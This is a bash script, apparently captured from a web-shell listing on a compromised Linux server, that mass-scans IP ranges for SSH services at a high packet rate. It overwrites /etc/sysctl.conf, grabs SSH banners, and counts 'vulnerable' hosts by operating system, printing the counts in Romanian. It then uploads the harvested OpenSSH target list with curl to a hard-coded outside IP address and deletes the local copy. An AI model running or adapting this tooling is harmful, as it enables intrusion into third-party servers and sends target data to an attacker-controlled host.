Server : nginx/1.18.0 System : Linux localhost 6.14.3-x86_64-linode168 #1 SMP PREEMPT_DYNAMIC Mon Apr 21 19:47:55 EDT 2025 x86_64 User : www-data ( 33) PHP Version : 8.0.16 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare, Directory : /mnt/ban2/ |
#!/bin/bash
rm -rf /etc/sysctl.conf ; echo "fs.file-max = 2097152" > /etc/sysctl.conf ; sysctl -p ; ulimit -Hn ; ulimit -n 999999 -u 999999
rm -rf banner.log scan.log ip.tmp
if ! command -v curl &> /dev/null; then
if [ -x "$(command -v apt-get)" ]; then
apt-get install -y curl
elif [ -x "$(command -v yum)" ]; then
yum install -y curl
else
echo "curl muie ips"
exit 1
fi
fi
echo "Starting ranges with port $1"
./m -p$1 -iL ranges.lst --rate 80000 --exclude 255.255.255.255 --exclude 10.0.0.0/8 --exclude 192.168.0.0/16 --exclude 127.0.0.0/8 >input.txt
#zmap -i eth0 -p $1 -o input.txt -w ranges.lst -B1000M
cat input.txt |awk '{print $6}' > ip.tmp
#zmap=cat input.txt |awk '{print $1}' > ip.tmp
sed -e "s/$/:$1/g" ip.tmp >> scan.log
./banner b -t 2500
rm -rf scan.log
vulns=$(cat banner.log |wc -l) > /dev/null
ubuntu=$(cat banner.log |grep Ubuntu |wc -l) > /dev/null
debian=$(cat banner.log |grep Debian |wc -l) > /dev/null
freebsd=$(cat banner.log |grep FreeBSD |wc -l) > /dev/null
altele=$(cat banner.log |grep -v FreeBSD |grep -v Debian |grep -v Ubuntu |wc -l) > /dev/null
echo -e "[*] Am gasit \e[92m[$vulns]\e[0m servere vulnerabile"
echo -e "[*] Ubuntu: \e[93m[$ubuntu]\e[0m"
echo -e "[*] Debian: \e[93m[$debian]\e[0m"
echo -e "[*] FreeBSD: \e[93m[$freebsd]\e[0m"
echo -e "[*] Altele: \e[93m[$altele]\e[0m"
cat banner.log |grep SSH-2.0-OpenSSH_ |awk '{print $1}' |uniq |shuf >> scan.log
random_name="IPS$(date '+%s%N').txt"
cp scan.log "$random_name"
curl -X POST -F "file=@$random_name" "http://178.62.225.127:6969/upload"
rm -rf "$random_name"
sleep 1
echo "done"
rm -rf banner.log
cat scan.log >> ipz
sleep 5